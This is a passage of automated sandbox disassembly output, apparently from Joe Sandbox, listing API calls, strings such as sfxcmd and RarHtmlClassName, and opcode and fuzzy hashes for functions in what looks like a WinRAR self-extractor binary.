                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EDA8
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EDB6
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EDC4
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF655925AB4), ref: 00007FF65593EE05
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                • String ID:
                                                                                • API String ID: 2092733347-0
                                                                                • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                • Instruction ID: 2a6a481ff47cd018786c4169cbe8fe3d2aa4423ee29cf8e956c1b9ecee9059a0
                                                                                • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                • Instruction Fuzzy Hash: 11516CB6B10691CAEB14CFA4D4481AC37B1F748B88B64403ADE0DA7B59DF3CD955C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                • String ID:
                                                                                • API String ID: 2092733347-0
                                                                                • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                • Instruction ID: 3eead3e5b903a5d0af61019e98ba163d2d622be7c5ae692a1da86511e8bf04f9
                                                                                • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                • Instruction Fuzzy Hash: 1C312B66B10A91C9EB00CFB5E8941AC3770FB08B5CB54502ADE4DA7A59EF3CD895C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: .rar$exe$rar$sfx
                                                                                • API String ID: 3668304517-630704357
                                                                                • Opcode ID: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                • Instruction ID: c939d0ab87a9ef97b83884b38fa07db14909fe7d520a0d511a574ffd93b55ca0
                                                                                • Opcode Fuzzy Hash: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                • Instruction Fuzzy Hash: B6A1D22EA0468680EB009B25D8592BC23A1BF45F9CF591235DD1DA77E7DF3CEA55C380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2889003569-2084237596
                                                                                • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction ID: 9f4dafed2061a94df177e6491f1abb45840be813b1d4c139c9626da44e5c31c7
                                                                                • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction Fuzzy Hash: 39919E77A08BC18AE710CB65E8442AD7BA0FB04B99F184139EE4DA7756DF3CD5A5CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                • Instruction ID: 9ede53612541f968dac1f857461bd2fdd204dd522a98fb547900b1da8e6eaf20
                                                                                • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                • Instruction Fuzzy Hash: 2751C13AA1968286DB14CB21E548A393795FF40F9DF588030DA5EA774AEF7CEC51C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                • API String ID: 2102711378-639343689
                                                                                • Opcode ID: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                • Instruction ID: ecea991c85dfcb08f688966caadd948ace2408d6313659d4c62a9d4c0ee1c809
                                                                                • Opcode Fuzzy Hash: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                • Instruction Fuzzy Hash: F051C46AE187C145FB00DB64D8592BD23A1AF85BACF480135DE1DA36A7DF3CAC86C241
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Rect
                                                                                • String ID: RarHtmlClassName
                                                                                • API String ID: 2396740005-1658105358
                                                                                • Opcode ID: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction ID: 3995c8533744bfdd6ad426a6812134632e44c5d304038858704f363bd748c5b6
                                                                                • Opcode Fuzzy Hash: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction Fuzzy Hash: 15518439A087C586EA24DB21E45837A63A1FF85F88F084535DE8E97B56DF3CEC458700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                • String ID: sfxcmd$sfxpar
                                                                                • API String ID: 3540648995-3493335439
                                                                                • Opcode ID: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                • Instruction ID: d167352a66d9eb2d452ad75e21355001c6af0e2d0f36a3bc587acb555709a8b1
                                                                                • Opcode Fuzzy Hash: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                • Instruction Fuzzy Hash: E9316F7AA14B86C4EB048B65E4881AC2371FB88F9CF581131DE5DA7BAADF3CD855C344
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                • API String ID: 0-56093855
                                                                                • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                • Instruction ID: ab631da0875cdab679e3639f88549e0618ef7f68072c974a9cab70fc272049fd
                                                                                • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                • Instruction Fuzzy Hash: F821D02D908BC7C2EA108B15A84817527A0FB49F8CF280036D9ADA3362DF3DEC848341
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                • Instruction ID: ad199a47af0c4ff27a43fe4599fb3813b4152381c4077a755224afdaf6ccd689
                                                                                • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                • Instruction Fuzzy Hash: 01F06829A19BC281EF448B11F45827963A0EF88F98F4C1035E94F96666DF3CD898C780
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                • Instruction ID: 009c771abf59d4cbc47cc601f8162263bfa1161580d3962a3b3ef5e0a6168c51
                                                                                • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                • Instruction Fuzzy Hash: B081D2AAE1879245F7109BA588886BC26A0BB45F8CF4C4135CD0FE3A97CF3CAC59C751
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2398171386-0
                                                                                • Opcode ID: d0479325b88890862111e7aa44f383cc57eeb18b26d51e7f766025fa2f1e620b
                                                                                • Instruction ID: 5022040112f7076b6ac22ef2adc89b17a8d20e9fcaaaaa927a45f78acc0d5011
                                                                                • Opcode Fuzzy Hash: d0479325b88890862111e7aa44f383cc57eeb18b26d51e7f766025fa2f1e620b
                                                                                • Instruction Fuzzy Hash: 5751D32AB04B8299FB108B69E4483BD23B1AB44BACF194635DE1DA67D6DF3C9845C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3659116390-0
                                                                                • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                • Instruction ID: ba6963f0b09631bf3f20b6651ecac1fd80424954e9941a711c58ade8606eddfc
                                                                                • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                • Instruction Fuzzy Hash: FE51D176A14A9185E710CB65D4883AC3BB1FB54B9CF088135CE4EA7A9ADF3CD549C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: 0c9fa0c6bf819422fbbcbf8a1cc47624dda944ba8802b04b3bf134fe07a1f51e
                                                                                • Instruction ID: a24e25b390d5dd75f8b0b7fbd3fb0191d33c89ea249bbddcc1ae8b1f39d658ad
                                                                                • Opcode Fuzzy Hash: 0c9fa0c6bf819422fbbcbf8a1cc47624dda944ba8802b04b3bf134fe07a1f51e
                                                                                • Instruction Fuzzy Hash: 0341C539A0978589EB149F2194482B82291EF04FA9F1C4634EAADE77D7EF3CD8659340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction ID: c99885de27083d4f0768ce53a6cdbbfe949115e02416b99f158ef383a3e2a3f8
                                                                                • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction Fuzzy Hash: A44128AAB19A8281FA168F12A80C6752396BF44FE8F0D4535DD1DDB746EF3CE8118340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                • Instruction ID: 688f17a2d45195a6ec1544f4585d0991a060145b0a5f503da2055f9465e885a8
                                                                                • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                • Instruction Fuzzy Hash: F511907EE1878791FB640124E58937901416F54BA8ECC4230EA7DE65D78F2CEC484186
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: __except_validate_context_recordabort
                                                                                • String ID: csm$csm
                                                                                • API String ID: 746414643-3733052814
                                                                                • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction ID: 8a5cd47d92edb23714e051540a55a7049d17142b447b37a3f50a595bcc905ae5
                                                                                • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction Fuzzy Hash: DF71AF6A6086C186D7618F25D05877D7BA0EF01F8EF089135DA8DA7A86CF3CE8A1C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: $*
                                                                                • API String ID: 3215553584-3982473090
                                                                                • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                • Instruction ID: e81c4e3d64b8a0a93596ea65a24d1b2ff676fd5f04de09b11b24b0c848031a92
                                                                                • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                • Instruction Fuzzy Hash: 5751347A90C6828AE7648E28845D3B83BA1EF05F5EF6C1135C64AE119ACF6CDCA5C705
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$StringType
                                                                                • String ID: $%s
                                                                                • API String ID: 3586891840-3791308623
                                                                                • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                • Instruction ID: 5f055d424d5c260f082f5172f6eb6362b5bbdb67cecf4cc5cb0d8047ce28fcf9
                                                                                • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                • Instruction Fuzzy Hash: CB416026B15BC18AEF618F25D8082A96291FB44FACF4C4235DE1DA77C6DF3CE9458380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                • String ID: csm
                                                                                • API String ID: 2466640111-1018135373
                                                                                • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                • Instruction ID: 74326094f1ead601a8ee9d24fe2f9ceb4f529220e7b7e646826f4a1f04be9697
                                                                                • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                • Instruction Fuzzy Hash: BD51707A61978187DA60AB25E04426E77A4FB88F95F480134DB8D97B57CF3CE860CB01
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                • String ID: U
                                                                                • API String ID: 2456169464-4171548499
                                                                                • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction ID: 552044d263f04da34a30c94dabd22738d7c15a6936b59761a0676385c13008ff
                                                                                • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction Fuzzy Hash: 8241C366618BC182DB108F65E8493B967A0FB88B98F484031EE4ED7789EF3CD845C740
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ObjectRelease
                                                                                • String ID:
                                                                                • API String ID: 1429681911-3916222277
                                                                                • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                • Instruction ID: bdf12429366fc851a1708c76e116f01581a0c0f4634fe8a6e0288bc9ffc5d774
                                                                                • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                • Instruction Fuzzy Hash: 5931203961878287DB14DF12B81862A7761F789FD5F544839ED4A93755CF3CE849CB00
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(?,?,?,00007FF65594317F,?,?,00001000,00007FF65592E51D), ref: 00007FF65593E8BB
                                                                                • CreateSemaphoreW.KERNEL32(?,?,?,00007FF65594317F,?,?,00001000,00007FF65592E51D), ref: 00007FF65593E8CB
                                                                                • CreateEventW.KERNEL32(?,?,?,00007FF65594317F,?,?,00001000,00007FF65592E51D), ref: 00007FF65593E8E4
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                • String ID: Thread pool initialization failed.
                                                                                • API String ID: 3340455307-2182114853
                                                                                • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                • Instruction ID: 27e520dbd783e1f98d3ce21c2bfe88f48ad4e9486d4ec0197352078afb23e304
                                                                                • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                • Instruction Fuzzy Hash: 7421A236E15682C6F7508F24D4487B936E2EB98F0CF1D8038CA0D9A296DF7EAC55C784
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 127614599-3916222277
                                                                                • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                • Instruction ID: 0df41683e291d4d4846fb4c2995a282197a58a79db27d893df1cae252b5ceb25
                                                                                • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                • Instruction Fuzzy Hash: 8AE08C24B0868282EB085BB6B59D02A2261AB4CFD0F198439EA1A83795CF3CC8844300
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                • String ID:
                                                                                • API String ID: 1137671866-0
                                                                                • Opcode ID: b1749055231bbdb6a6130f4ebdb939a528d16dbded721961105840a11406723d
                                                                                • Instruction ID: a0c9c52a40278ff5589457410e5572a462f9668c35ded30dc15e882358582a11
                                                                                • Opcode Fuzzy Hash: b1749055231bbdb6a6130f4ebdb939a528d16dbded721961105840a11406723d
                                                                                • Instruction Fuzzy Hash: 59A1D666B18BC281EA10DB64E8481ED6361FFC5B88F445131EA5DA7AEBDF3CE945C700
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
